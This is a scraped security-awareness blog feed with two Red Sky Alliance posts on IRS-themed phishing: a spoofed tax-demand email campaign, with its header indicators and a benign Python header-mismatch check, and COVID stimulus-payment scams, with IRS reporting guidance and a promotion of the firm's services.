<p>Weekly Cyber Intelligence Briefings: <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a> </p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.bankinfosecurity.com/irs-warns-fresh-fraud-tactics-as-tax-season-starts-a-16028?rf=2021-02-22_ENEWS_SUB_BIS__Slot6_ART16028">https://www.bankinfosecurity.com/irs-warns-fresh-fraud-tactics-as-tax-season-starts-a-16028?rf=2021-02-22_ENEWS_SUB_BIS__Slot6_ART16028</a></p></div>Phishing emails from the “IRS” are Backhttps://redskyalliance.org/xindustry/phishing-emails-from-the-irs-are-back2020-11-24T16:10:45.000Z2020-11-24T16:10:45.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}8211410658,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8211410658,RESIZE_400x{{/staticFileLink}}" width="250" alt="8211410658?profile=RESIZE_400x" /></a>In the US, many people fear the Internal Revenue Service (IRS). When a US citizen receives any type of communication from the IRS, they take notice. The cyber bad guys know that too and send IRS phishing messages to unwitting US citizens. In addition to scam voice mails and texts about your Social Security number being at risk, a “credible looking” yet fake IRS email has been sent to tens of thousands of email inboxes across the US. The question of authenticity can be explained in one quote, "The IRS does not send emails about your tax refund or sensitive financial information," says the IRS Commissioner. But hackers continue to send phishing scams capitalizing on concerns about the pandemic-related Economic Impact Payments and broader international COVID-19 concerns. </p>
<p>The fake email looks like it came from support@irs.gov, and the email claims that the IRS could not reach you by phone so now it is emailing you with a demand for more than $1,400 you supposedly owe in taxes. Failure to pay, the letter says, will lead to a visit from the sheriff's department and a notification to credit bureaus. Per the fraudulent email message, "The opportunity to take care of this voluntarily is quickly coming to an end... you can email back to the get the payment mode... please let us know what your intention is by today so we can hold your case or else we will submit the paperwork to the local county Sheriff's Department." This is very upsetting to many, who will act on the fake message.</p>
<p>If you get an email like this, it should be an instant red flag because cybercriminals love to use fear and urgency in their phishing campaigns. They hope you will take action before you think about it. Researchers at Abnormal Security tracked this phishing campaign after it reached between 50,000 and 70,000 email accounts and produced the following findings: this specific campaign is even more convincing because the attackers spoofed or imitated a legitimate domain. A reader who takes the time to look closer will find clues that this email is a fake. Although the email appears to originate from the domain 'irs.gov', analysis of the email <em>headers</em> reveals that the true sender domain is 'shoesbagsall.com'. Additionally, the 'Reply-To' email is 'legal.cc@outlook.com', which is not associated with the IRS and instead leads directly back to the attacker.</p>
<p>These are two obvious indicators of fraud, but they are certainly not the only ones. IRS related phishing scams target different audiences. Some target tax preparers, others target human resources (HR) and payroll teams or services, and some may be directed to individual tax payers.</p>
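<p>The two header indicators described above can be checked automatically. The following Python sketch is an added example, not code from the report or from Abnormal Security. It assumes the "true sender domain" is visible in the Return-Path header; the sample message is constructed, and only the three domains and the Reply-To address come from the report.</p>

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed sample message. Only irs.gov, shoesbagsall.com and the Reply-To
# address come from the report; local parts, subject and body are invented.
SAMPLE = """\
Return-Path: <bounce@shoesbagsall.com>
From: "IRS Support" <support@irs.gov>
Reply-To: legal.cc@outlook.com
To: taxpayer@example.com
Subject: Final notice

Body omitted.
"""


def domain_of(header_value):
    """Return the lower-cased domain of the first address in a header, or None."""
    if not header_value:
        return None
    _, addr = parseaddr(header_value)
    if "@" not in addr:
        return None  # covers empty values such as the null sender "<>"
    return addr.rsplit("@", 1)[1].strip().lower().rstrip(".")


def same_org(a, b):
    """True if the domains are equal or one is a subdomain of the other.

    Simplification: a production check would compare organizational domains
    using the Public Suffix List, as DMARC relaxed alignment does.
    """
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def header_indicators(raw_message):
    """List (header, domain) pairs whose domain does not align with From."""
    msg = message_from_string(raw_message)
    from_dom = domain_of(msg.get("From"))
    if from_dom is None:
        return [("From", None)]  # no parsable visible sender at all
    findings = []
    # Return-Path carries the envelope sender; Reply-To is where answers go.
    for header in ("Return-Path", "Reply-To"):
        other = domain_of(msg.get(header))
        if other and not same_org(from_dom, other):
            findings.append((header, other))
    return findings


if __name__ == "__main__":
    for header, dom in header_indicators(SAMPLE):
        print(f"{header} domain {dom} does not match the From domain")
```

<p>A mismatch is an indicator rather than proof, because legitimate bulk-mail services also use their own Return-Path domains; treat it as a reason to inspect the message further.</p>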
<p>What is the biggest problem with an email or text message claiming to come from the IRS with information about a refund, a balance owed, or a request to verify W-2 data? The IRS will never send emails like these. Ignore them, PERIOD.</p>
<p>If you have any questions about an email that states it is from the IRS, stop reading it and immediately visit: <a href="https://www.irs.gov/privacy-disclosure/report-phishing">https://www.irs.gov/privacy-disclosure/report-phishing</a> Per the link: "The IRS doesn't initiate contact with taxpayers by email, text messages or social media channels to request personal or financial information. This includes requests for PIN numbers, passwords or similar access information for credit cards, banks or other financial accounts."</p>
<p>The Internal Revenue Service provides a list of things it will not do. Looking at this list can help you avoid being scammed. The IRS will not:</p>
<ul>
<li>Call to demand immediate payment using a specific payment method such as a prepaid debit card, gift card or wire transfer. Generally, the IRS will first mail a bill to any taxpayer who owes taxes.</li>
<li>Demand that you pay taxes without the opportunity to question or appeal the amount they say you owe. You should also be advised of your rights as a taxpayer.</li>
<li>Threaten to bring in local police, immigration officers or other law-enforcement to have you arrested for not paying. The IRS also cannot revoke your driver’s license, business licenses, or immigration status.</li>
</ul>
<p>If you or a friend/relative, especially a senior citizen, receive emails relating to these things, you can be quite confident they are fake.</p>
<p>The IRS has several options for reporting IRS related scams, depending on the type of phishing attack you received and whether or not you or your organization fell for it.</p>
<p>For individual phishing emails that you believe are fake:</p>
<ul>
<li>Forward the scam or phishing email to phishing@irs.gov.</li>
</ul>
<p>For W-2 related phishing scams, the IRS suggests the following:</p>
<ul>
<li>If you accidentally gave cybercriminals W-2 information, email dataloss@irs.gov to notify the IRS of a W-2 data loss and provide contact information. In the subject line, type "W2 Data Loss" so that the email can be routed properly. Do not attach any employee personally identifiable information (PII).</li>
<li>Businesses/payroll service providers should file a complaint with the FBI's Internet Crime Complaint Center (IC3.gov). Businesses/payroll service providers may be asked to file a report with their local law enforcement.</li>
<li>Notify employees so they may take steps to protect themselves from identity theft. The FTC's <a href="http://www.identitytheft.gov">www.identitytheft.gov</a> provides general guidance.</li>
</ul>
<p>The IRS says it initiates most contacts through USPS mail, not emailing or texting or phone calls. That is important to keep in mind next time an urgent IRS phishing email arrives in your email inbox.</p>
<p>Red Sky Alliance has been analyzing and documenting cyber threats, vulnerabilities and cyber scams for over 9 years and maintains a resource library of malware and cyber actor reports. Malware comes and goes, but it is often dusted off and reappears in current campaigns.</p>
<p>Join our Alliance at: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a> It’s FREE.</p>
<p>Weekly Cyber Intelligence Briefings: </p>
<p><a href="https://attendee.gotowebinar.com/register/8782169210544615949">https://attendee.gotowebinar.com/register/8782169210544615949</a></p>
<p> </p></div>US IRS Warns of New Economic Stimulus Payment Scamshttps://redskyalliance.org/xindustry/us-irs-warns-of-new-economic-stimulus-payment-scams2020-04-28T12:46:28.000Z2020-04-28T12:46:28.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}4537443479,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}4537443479,RESIZE_400x{{/staticFileLink}}" width="250" alt="4537443479?profile=RESIZE_400x" /></a>US Tax Day has come and gone. Due to the COVID-19 pandemic, the US has delayed the filing deadline to July 15<sup>th</sup>. That is great news for many, AND additionally many taxpayers will be eligible for the US New Economic Stimulus program. The Internal Revenue Service (IRS) is now issuing warnings to alert the US public about a flood of coronavirus-related scams over email, phone calls, or social media requesting personal identifying information (pii) while using the pandemic economic impact payments as a disturbing lure. This fraud wave, which has led to identity theft and tax-related fraud, uses the COVID-19 crisis to trick desperate individuals into sharing their sensitive pii in exchange for help to quicken their entitled COVID-19 economic impact payments. These unscrupulous scammers never seem to take a day off and whenever possible, they will take advantage of a disaster to selfishly benefit themselves.</p>
<p>The IRS will never contact you for the information they already have in their records. "We urge people to take extra care during this period. The IRS isn't going to call you asking to verify or provide your financial information so you can get an economic impact payment or your refund faster," IRS Commissioner Chuck Rettig said. "That also applies to surprise emails that appear to be coming from the IRS. Remember, don't open them or click on attachments or links. Go to IRS.gov for the most up-to-date information." Cyber threat analysts with Red Sky Alliance are currently tracking numerous variants of malware being used in conjunction with good old-fashioned social engineering and phishing campaigns. In politics there is a saying that you should never let a disaster go to waste. Well, the same holds true with criminal behavior. </p>
<p>The COVID-19 economic impact payments are going to be distributed within the next few weeks, even though scammers will promise to get them deposited in your bank account a lot faster, as United States Attorney for Eastern Kentucky Robert M. Duncan explained in a US Department of Justice March 2020 press release and reinforced through many federal partners like US SEN. J. Shaheen, D-NH. Most of the eligible Americans will have the funds sent as a direct deposit into their bank accounts per the US Department of the Treasury, while those without direct deposit capabilities will receive the approved $1,200 economic impact payments via paper check.<a href="#_ftn1">[1]</a> The scammers, attempting to exploit taxpayers' hardship caused by the COVID-19 pandemic and playing on their anxiousness to receive already approved payments, try to get them to 'verify' the information needed for the money to be deposited. This stolen information will be used later by the crooks to file false tax returns as part of identity theft schemes. "Because of this, everyone receiving money from the government from the COVID-19 economic impact payment is at risk," US Attorney Duncan warned.</p>
<p><a href="{{#staticFileLink}}4537450570,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}4537450570,RESIZE_400x{{/staticFileLink}}" width="250" alt="4537450570?profile=RESIZE_400x" /></a>Retired US citizens are the most exposed to these scams and are reminded by the US IRS that it will not ask them for info related to the coronavirus economic impact payment by phone, email, mail or in person; again they already have the information and do not need to verify any information. If you have older relatives, please speak to them as soon as possible about not sharing any pii to any caller, email or USPS request. Scammers use a wide variety of tactics to trick people into sharing their personal or financial information, with some of them potentially attempting to:</p>
<ul>
<li>Emphasize the words "Stimulus Check" or "Stimulus Payment." The official term is economic impact payment.</li>
<li>Ask the taxpayer to sign over their economic impact payment check to them.</li>
<li>Ask by phone, email, text or social media for verification of personal and/or banking information saying that the information is needed to receive or speed up their economic impact payment.</li>
<li>Suggest that they can get a tax refund or economic impact payment faster by working on the taxpayer's behalf. This scam could be conducted by social media or even in person.</li>
<li>Mail the taxpayer a bogus check, perhaps in an odd amount, then tell the taxpayer to call a number or verify information online in order to cash it.</li>
</ul>
<p>Taxpayers should never share their banking information with others when asked to provide it by any party. "Those taxpayers who have previously filed but not provided direct deposit information to the IRS will be able to provide their banking information online to a newly designed secure portal on IRS.gov in mid-April," the IRS said.</p>
<p>Detailed and official info on the COVID-19 economic impact payments is available on the IRS.gov Coronavirus Tax Relief page, with info on who is eligible and how the IRS will know where to send the payments accessible here.</p>
<p>Taxpayers who have been or will be targeted by fraudsters with Coronavirus-related or other types of phishing attempts via unsolicited emails, text messages, or social media are urged by the IRS to report them to phishing@irs.gov. </p>
<p>Red Sky Alliance has been analyzing and documenting cyber threats for 8 years and maintains a resource library of malware and cyber actor reports. </p>
<p>The installation, updating and monitoring of firewalls, cyber security and proper employee training are keys to blocking attacks. Please feel free to contact our analyst team for research assistance and Cyber Threat Analysis on your organization.</p>
<p>What can you do to better protect your organization today?</p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data back-up and off-site storage policies should be adopted and followed.</li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services and devices to be used by all at home working employees and consultants.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications directed at your domains. RedXray service is $500 a month and provides threat intelligence on nine (9) cyber threat categories including Keyloggers, without having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> Interested in a RedXray demonstration or subscription to see what we can do for you? Sign up here: <a href="https://www.wapacklabs.com/redxray">https://www.wapacklabs.com/redxray</a> </p>
<p><strong>Reporting: </strong><a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br /><strong>Website: </strong><a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br /><strong>LinkedIn: </strong><a href="https://www.linkedin.com/company/wapacklabs/">https://www.linkedin.com/company/wapacklabs/</a><br /><strong>Twitter: </strong><a href="https://twitter.com/wapacklabs?lang=en">https://twitter.com/wapacklabs?lang=en</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.bleepingcomputer.com/news/security/irs-warns-of-surge-in-economic-stimulus-payment-scams/">https://www.bleepingcomputer.com/news/security/irs-warns-of-surge-in-economic-stimulus-payment-scams/</a></p></div>